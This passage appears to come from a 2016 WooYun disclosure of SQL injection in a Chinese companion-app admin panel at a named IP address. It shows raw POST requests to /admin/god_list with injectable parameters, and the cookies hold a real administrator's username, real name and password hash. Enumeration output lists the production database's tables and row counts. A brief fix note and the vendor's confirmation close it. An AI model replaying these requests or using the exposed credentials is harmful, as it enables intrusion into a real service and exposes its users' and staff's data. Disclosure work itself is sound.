%3A1%3A%220%22%3Bs%3A5%3A%22token%22%3Bs%3A0%3A%22%22%3Bs%3A8%3A%22realname%22%3Bs%3A6%3A%22%E9%83%AD%E8%B6%85%22%3Bs%3A14%3A%22remember_token%22%3BN%3Bs%3A10%3A%22updated_at%22%3BN%3B%7D%7D4bcb57eee7a61ab4f899d97f5db07424
pageNum=1&numPerPage=20&wangbano=1&store_name=1&server_version=1&can_recharge=&can_select_balance=
--------------------------另外一处----------参数 mobile--------------------
POST /admin/god_list HTTP/1.1
Host: 121.40.223.69:8028
Proxy-Connection: keep-alive
Content-Length: 206
Accept: */*
Origin: http://121.40.223.69:8028
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://121.40.223.69:8028/admin/index
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ci_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%221eae6a510bc7164581ec422a36287375%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22115.214.46.142%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A120%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F38.0.2125.122+Safari%2F537.36+SE+2.X+Met%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1462991222%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A13%3A%22session_admin%22%3BO%3A8%3A%22stdClass%22%3A12%3A%7Bs%3A2%3A%22id%22%3Bs%3A32%3A%228866911c1bcf252661f371d551223e21%22%3Bs%3A8%3A%22username%22%3Bs%3A7%3A%22guochao%22%3Bs%3A8%3A%22password%22%3Bs%3A32%3A%22290627921faed27657267299574975b8%22%3Bs%3A6%3A%22status%22%3Bs%3A1%3A%221%22%3Bs%3A4%3A%22role%22%3Bs%3A32%3A%22561168d496841527359a0c57b7586a3e%22%3Bs%3A8%3A%22store_id%22%3Bs%3A0%3A%22%22%3Bs%3A11%3A%22create_time%22%3Bs%3A19%3A%222016-03-01+15%3A44%3A02%22%3Bs%3A4%3A%22city%22%3Bs%3A1%3A%220%22%3Bs%3A5%3A%22token%22%3Bs%3A0%3A%22%22%3Bs%3A8%3A%22realname%22%3Bs%3A6%3A%22%E9%83%AD%E8%B6%85%22%3Bs%3A14%3A%22remember_token%22%3BN%3Bs%3A10%3A%22updated_at%22%3BN%3B%7D%7D681991a95831bb63fbe22bb5f789610c
pageNum=1&numPerPage=20&mobile=1&source=&isbind=&is_official=&price_begin=1&price_end=&god_company_id=&keyword=1&true_name=&gender=&status=&createtime_begin=2016-05-11&createtime_end=2016-05-19&city_name=11


数据库信息

available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] ypp_app_test


表信息

Database: ypp_app_test
+----------------------------------+---------+
| Table | Entries |
+----------------------------------+---------+
| t_user_login | 4918627 |
| t_dongtai_reply | 3559021 |
| t_score_journal | 2950727 |
| t_recharge | 1722530 |
| t_notify | 1433701 |
| t_sms_log | 1269551 |
| t_god_score_log | 1092585 |
| t_platform_game_winner | 1040977 |
| t_user_ext | 802812 |
| t_user | 801473 |
| t_sys_invite_code | 772075 |
| t_wy_register | 641601 |
| t_coupon_detail | 638662 |
| t_user_journal | 488742 |
| t_sms_submail_log | 478570 |
| t_user_month_login | 470310 |
| t_dongtai | 428084 |
| t_dongtai_dashang | 405641 |
| t_god_lovelog | 398673 |
| t_fin_alipayjournal_old | 393343 |
| t_user_cash_journal | 389924 |
| t_recharge_pomotion_users | 327359 |
| t_play_order | 257786 |
| t_platform_game_winner_backup | 256938 |
| t_admin_log | 250742 |
| t_user_photo | 234687 |
| t_staff_drink | 229784 |
| t_signin | 220205 |
| t_chat_log | 186966 |
| t_mobile_area | 149310 |
| t_god_apply_photo | 129561 |
| t_play_response | 126662 |
| t_user_game | 111407 |
| t_god_journal | 109822 |
| t_user_oftenstore | 94596 |
| t_play_order_rate | 84686 |
| t_fin_alipayjournal | 70690 |
| t_store_recharge_day_report | 67199 |
| t_group_member | 63781 |
| t_god_cert | 62472 |
| t_god_apply | 54037 |
| t_fin_weixinjournal | 48846 |
| t_biz_log | 48316 |
| t_user_invite | 28339 |
| t_god_items | 25889 |
| t_store_machine | 25241 |
| t_play_order_god_rate | 24506 |
| t_user_count | 24095 |
| t_god_item_apply | 22043 |
| t_godgame_photo | 19752 |
| t_cash_give | 15052 |
| t_reserve | 14859 |
| t_god_jiesuan | 14262 |
| t_cash_get | 14107 |
| t_god_edit_apply | 13451 |
| t_bind_journal | 12344 |
| t_coupon_codes | 9311 |
| t_god | 9259 |
| t_god_order_day_log | 8445 |
| t_user_auth | 8151 |
| t_jubao | 7922 |
| t_play_order_day_report | 7280 |
| t_withdraw | 6647 |
| t_god_game | 6590 |
| t_dongtai_dashang_day_report | 6038 |
| t_god_search | 5982 |
| t_bind_journal_day_report | 5577 |
| t_group | 5017 |
| t_user_alias | 4613 |
| t_group_invitelog | 4476 |
| t_user_poi | 4013 |
| tmp_god_ids | 3909 |
| t_game_winner_day_report | 3415 |
| t_bind_journal_jiaoban_report | 3219 |
| t_shenzhi_code | 3000 |
| t_activity_member | 2947 |
| t_chat_check | 2805 |
| t_admin_role_function | 2638 |
| test_code | 2231 |
| t_biz_city_cat_price | 2186 |
| t_dongtai_dashang_jiaoban_report | 2071 |
| t_group_photo | 2035 |
| t_user_vip | 2015 |
| t_store_recharge_jiaoban_report | 1861 |
| t_tg_gudu | 1825 |
| t_game_winner_jiaoban_report | 1741 |
| t_user_journal_jiaoban_report | 1741 |
| t_fin_changelog | 1589 |
| t_suggestion | 1581 |
| t_store_region | 1541 |
| tmp_dongtai | 1182 |
| t_group_poi | 1065 |
| t_store | 753 |
| t_god_100 | 721 |
| t_activity | 677 |
| t_god_recommand | 525 |
| t_game_partition | 524 |
| t_biz_city_cat | 440 |
| t_activity_reply | 434 |
| t_sys_citys | 407 |
| tmp_gods | 381 |
| t_pubwin_stores | 373 |
| t_city | 372 |
| t_admin_function | 371 |
| t_play_order_shensu | 371 |
| t_ypp_money | 304 |
| t_game_duanwei | 296 |
| t_manual_recharge_to_ypp | 245 |
| t_apilist | 241 |
| t_gym | 237 |
| t_store_manager | 227 |
| t_coupon | 180 |
| t_mall_order | 128 |
| t_bizcircle | 122 |
| t_god_city | 95 |
| t_cat_tag | 90 |
| t_dongtai_keyword | 75 |
| t_game_weizhi | 73 |
| t_playorder_recharge_log | 64 |
| t_god_eidt_price_apply | 51 |
| t_admin_staff | 49 |
| t_banner | 39 |
| t_user_vip_hours | 35 |
| t_cat_level | 32 |
| t_pubwin_region | 31 |
| t_download_ypp | 30 |
| t_dictionary | 29 |
| t_coupon_laplus | 27 |
| t_user_black | 25 |
| t_tuiguang_qudao | 23 |
| t_user_subscribe | 22 |
| t_admin_role | 21 |
| t_biz_cat | 19 |
| t_sysmessage | 19 |
| t_biz_cat_price | 18 |
| t_region | 15 |
| t_game | 13 |
| t_biz_cert | 12 |
| t_recharge_promotion_detail | 12 |
| t_bank | 10 |
| t_search_hotwords | 10 |
| t_biz_navigation | 9 |
| t_recharge_promotion | 9 |
| t_wy_shop_region | 9 |
| t_huodong_item | 8 |
| t_user_vip_coupon | 8 |
| t_compaign | 7 |
| t_jubao_reason | 7 |
| t_act_prize_config | 6 |
| t_complain_custome | 6 |
| t_quiz_items | 6 |
| t_version | 6 |
| t_god_company | 5 |
| t_god_guides | 5 |
| t_user_attach | 5 |
| t_user_vip_config | 4 |
| t_chat_warn | 3 |
| t_coupon_user | 3 |
| t_hobby | 3 |
| t_mall_product | 3 |
| t_quiz | 3 |
| t_site | 3 |
| t_ad | 2 |
| t_city_new_cat_img | 2 |
| t_data_version | 2 |
| t_drink | 2 |
| t_home_recommand | 2 |
| t_huodong | 2 |
| t_act_qualifications_config | 1 |
| t_app_setting | 1 |
| t_god_cert_edit_apply | 1 |
| t_groupno | 1 |
| t_platform_game | 1 |
| t_pushmessage | 1 |
+----------------------------------+---------+


修复方案:

过滤下参数 加强密码

版权声明:转载请注明来源 黑色键盘丶@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2016-05-12 10:26

厂商回复:

漏洞严重,内部数据库暴露,目前已经组织修复。

最新状态:

暂无


漏洞评价:

评价

  1. 2016-05-12 12:44 | hey_man ( 路人 | Rank:8 漏洞数:2 | A man)

    洞主真J8牛逼